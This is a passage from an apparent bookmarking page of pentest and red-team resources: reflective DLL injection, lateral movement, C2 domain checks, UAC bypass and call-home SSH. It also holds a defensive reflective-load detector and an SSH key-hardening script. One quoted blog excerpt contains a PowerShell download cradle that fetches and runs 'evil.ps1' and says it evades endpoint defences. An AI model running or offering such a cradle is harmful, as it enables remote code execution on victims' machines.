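     "base": 0x1F0000, "size": 0x6000, "protect": "PAGE_READWRITE"},
    {"pid": 900, "image": "svchost.exe", "api": "VirtualAlloc",
     "base": 0x2A0000, "size": 0x1000, "protect": "PAGE_READWRITE"},
    {"pid": 4242, "image": "WINWORD.EXE", "api": "VirtualProtect",
     "base": 0x1F0000, "protect": "PAGE_EXECUTE_READ"},
    {"pid": 4242, "image": "WINWORD.EXE", "api": "CreateThread", "start": 0x1F1040},
    {"pid": 900, "image": "svchost.exe", "api": "VirtualProtect",
     "base": 0x2A0000, "protect": "PAGE_READONLY"},
]

if __name__ == "__main__":
    for pid, image, why in detect_reflective_load(SAMPLE_EVENTS):
        print(pid, image, why)
```

Signals 2 and 3 together are what distinguishes a reflective loader from a JIT: a JIT tends to allocate RWX and keep writing, while a loader writes once, drops write, and then executes from the region. The stephenfewer and clymb3r loaders bookmarked above both follow the second pattern, which is why memory-protection telemetry rather than file or service creation is where this class gets caught.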
Reflective DLL Injection with PowerShell | clymb3r
The script currently allows you to load a DLL from a local file (and execute it remotely) or retrieving the DLL from a URL. It is also possible and easy to modify the script with a hardcoded DLL byte array; I recommend doing this for any DLL you plan on using often.
powershell  malware  pentest 
9 weeks ago by whip_lash
DOUBLEPULSAR Usermode Analysis: Generic Reflective DLL Loader | Countercept
We have released a small utility that can be used to invoke the usermode DLL loading mechanism of the DOUBLEPULSAR payload in order to test detection mechanisms and perform further research. This will use the shellcode to inject a DLL into a process of your choice, entirely from usermode.

The utility is available here.
malware  pentest 
9 weeks ago by whip_lash
sRDI - Shellcode Reflective DLL Injection | Silent Break Security
“You can now convert any DLL to position independent shellcode at any time, on the fly.”

This tool is mainly relevant to people who write/customize malware. If you don’t know how to write a DLL, I doubt most of this applies to you. With that said, if you are interested in writing something more than a PowerShell script or Py2Exe executable to perform red-teaming, this is a great place to start.
malware  pentest 
9 weeks ago by whip_lash
New lateral movement techniques abuse DCOM technology
The instantiation of a remote DCOM object behaves as follows:

The client machine requests an instantiation of an object denoted by a CLSID from a remote machine. If the client uses a ProgID, it is first resolved locally to a CLSID.
The remote machine checks if there is an AppID associated with the CLSID in question, and verifies the permissions of the client.
If all goes well, the DCOMLaunch service creates an instance of the requested class, most commonly by running the executable of the LocalServer32 subkey, or by creating a DllHost process to host a dll referenced by the InProcServer32 subkey.
Communication is established between the client application and the server process. In most cases, the new process is created in the session associated with the DCOM communication.
The client is then able to access the members and methods of the newly created object.
dcom  pentest  postexploitation 
9 weeks ago by whip_lash
Being a Good Domain Shepherd – Posts By SpecterOps Team Members
DomainCheck pulls a list of domains registered under the provided Namecheap account, collects the DNS records set for each domain, and then reviews each one to ensure it is ready to be used. This involves checking to see if WhoisGuard is enabled, the domain is not expired, the domain is properly categorized, the domain has not been flagged in VirusTotal or tagged with a bad category, and the domain is not blacklisted for spam.

The DomainReview class uses the following sources to check the health of a domain name:

Cisco Talos
Bluecoat
IBM X-Force
Fortiguard
TrendMicro
OpenDNS
MXToolbox
VirusTotal
Cymon
c2  domain  tool  pentest 
10 weeks ago by whip_lash
GitHub - yeyintminthuhtut/Awesome-Red-Teaming: List of Awesome Red Teaming Resources
Favorite tweet:

Awesome Red Teaming.

Initial Access
Execution
Persistence
Privilege Escalation
Defense Evasion
Credential Access
Discovery
Lateral Movement
Collection
Exfiltration
Command and Control
Misc
RedTeam Gadgets
Ebooks
Training
Certification https://t.co/rwMhVbtBAi

— Emad Shanab (@Alra3ees) December 8, 2018
pentest  pentesting  redteam 
10 weeks ago by whip_lash
Using C# for post-PowerShell attacks | Forcepoint
A blog post by Forty North Security built on Matt Graeber’s research into Microsoft.Workflow.Compiler.exe and demonstrated that you can use the technique to run shellcode on a machine. In both cases the authors used a local payload file and, while it may seem a minor difference, we wanted to see if it was possible to compile and execute a file hosted remotely.
windows  pentest  c# 
10 weeks ago by whip_lash
Red XOR Blue: SharpCradle - Loading remote C# binaries and executing them in memory
SharpCradle isn't exactly the same as our traditional powershell download cradle ( IEX (New-Object Net.Webclient).downloadstring("http://IP/evil.ps1") ) but the concept, at least to me, is the same.  We are simply reaching out from our victim's machine to somewhere remotely and retrieving our evil code and executing it in memory.  This helps in bypassing endpoint protections by making it harder to detect what exactly we are up to.  In fact, I have used this on a wide variety of client engagements and it has yet to get flagged, though I am sure that will eventually change as defenses are getting better every day.
c#  pentest  security 
10 weeks ago by whip_lash
Provadys Offensive Security Blog
Last May, Casey Smith pointed out on twitter and on his blog that the .NET profiler DLL loading can be abused to make a legit .NET application load a malicious DLL using environment variables.

When reading this, first thing that came to mind was "if this works with elevated .NET processes, this would make a nice UAC bypass as well". And sure enough, it does.

This issue is still unfixed as of this writing – and may remain so – but is already public since July, as it was independently discovered, reported and published on Full Disclosure by Stefan Kanthak.
hacking  uac  windows  pentest 
10 weeks ago by whip_lash
Improved call-home SSH scripts | TXLAB
In the new approach, the remote stations all have the same ssh_tunnel.sh script, and they only differ in SSH keys. It's important to have a unique SSH key on each machine, in order to be able to quickly disable access if the host is compromised.
ssh  pentest  pentesting 
10 weeks ago by whip_lash
Call-home SSH scripts | TXLAB
Here’s the startup script /etc/init.d/callhome_ssh_tunnel which brings up the tunnel at the computer boot
ssh  pentest  pentesting 
10 weeks ago by whip_lash
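Added example for the two TXLAB call-home posts above (not their scripts): the hub-side half of "one key per station". Each station gets its own `authorized_keys` entry, so a compromised station is cut off by deleting one line, and the entry is confined to the single reverse-tunnel port that station owns. Station names, ports and the placeholder keys are constructed; `permitlisten` needs OpenSSH 7.8 or newer on the hub, and `command="/bin/sleep infinity"` assumes GNU coreutils there.

```python
# Constructed inventory of remote stations: one keypair per station (the
# point of the post) and the fixed hub port each one is allowed to
# reverse-forward onto (ssh -R <port>:localhost:22 hub).  Keys are placeholders.
STATIONS = [
    {"host": "station-01", "port": 2201,
     "pubkey": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyForStation01xxxxxxxxxxxxxxxxx"},
    {"host": "station-02", "port": 2202,
     "pubkey": "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyForStation02xxxxxxxxxxxxxxxxx"},
]


def authorized_key_line(station):
    """One authorized_keys entry that can do nothing except hold its own tunnel.

    restrict        - disables pty, agent/X11/port forwarding, rc files
    port-forwarding - re-enables forwarding so -R works at all
    permitlisten    - confines -R to this station's hub port (OpenSSH 7.8+)
    command=        - whatever the client asks for, the session only sleeps,
                      so a stolen key yields a tunnel slot, not a shell
    The trailing comment is the station name; revoke_station() keys on it.
    """
    options = ",".join([
        "restrict",
        "port-forwarding",
        'permitlisten="localhost:%d"' % station["port"],
        'command="/bin/sleep infinity"',
    ])
    return "%s %s %s" % (options, station["pubkey"], station["host"])


def build_authorized_keys(stations):
    return "".join(authorized_key_line(s) + "\n" for s in stations)


def revoke_station(authorized_keys_text, host):
    """Drop the compromised station's line; every other station keeps working."""
    kept = [l for l in authorized_keys_text.splitlines() if l.split()[-1] != host]
    return "".join(l + "\n" for l in kept)


def split_options(line):
    """Split the leading option list from an authorized_keys line.

    Commas and spaces inside double quotes belong to the option (sshd parses
    it the same way), so command="/bin/sleep infinity" stays in one piece.
    Only meant for lines that start with options, like the ones built here.
    """
    opts, cur, in_quotes = [], "", False
    for i, ch in enumerate(line):
        if ch == '"':
            in_quotes = not in_quotes
        elif ch == "," and not in_quotes:
            opts.append(cur)
            cur = ""
            continue
        elif ch == " " and not in_quotes:
            opts.append(cur)
            return opts, line[i + 1:]
        cur += ch
    opts.append(cur)
    return opts, ""


if __name__ == "__main__":
    text = build_authorized_keys(STATIONS)
    print(text)
    print("after revoking station-01:")
    print(revoke_station(text, "station-01"))
```

The client side stays as in the posts (the same script everywhere, `-N -R <port>:localhost:22`, its own key); what changes is that the hub no longer has to trust the station's intent. Without `permitlisten`, any station could bind another station's port and sit in the middle of the operator's SSH sessions to it, and without `restrict` plus a forced command the key is a login to the hub.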
Classic 802.1x Bypass · s0lst1c3/silentbridge Wiki · GitHub
The classic 802.1x bypass is by far the simplest to perform, and is effective against 802.1x-2004 and 802.1x-2001
802.1x  portsecurity  nac  pentest  pentesting 
10 weeks ago by whip_lash
A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity – Robert M. Lee
I commonly get asked by folks what approach they should take to get started in industrial control system (ICS) cybersecurity. Sometimes these individuals have backgrounds in control systems, sometimes they have backgrounds in security, and sometimes they are completely new to both.
ics  security  pentest 
10 weeks ago by whip_lash
GitHub - infosecn1nja/AD-Attack-Defense: Active Directory Security For Red & Blue Team
This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise active directory and guidance to mitigation, detection, and prevention. And understand Active Directory Kill Chain Attack and Modern Post Exploitation Adversary Tradecraft Activity.
activedirectory  pentest 
10 weeks ago by whip_lash